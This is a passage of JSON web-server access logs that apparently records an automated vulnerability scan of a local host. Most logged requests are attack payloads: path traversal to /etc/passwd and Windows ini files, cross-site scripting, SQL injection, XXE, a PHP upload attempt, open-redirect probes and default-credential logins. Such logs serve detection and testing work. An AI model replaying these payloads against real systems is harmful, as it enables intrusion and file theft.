HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/proxy/tcp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/project?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(297MbBSKbsQ0VvXibQBlNaZRHlF)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A]>\x0D\x0A\x0D\x0A&xxe;\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27297MbEZn4d4ZXa2KNLYExYBjlMN%27%29%3C%2Fscript%3E&pw=nordex&language=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"csrf_token={{csrf_token}}&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /session HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"------WebKitFormBoundaryfcKRltGv\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.php\x22\x0D\x0AContent-Type: image/avif\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryfcKRltGv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Upload/upload_file.php?l=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Upload/test/test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.231","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 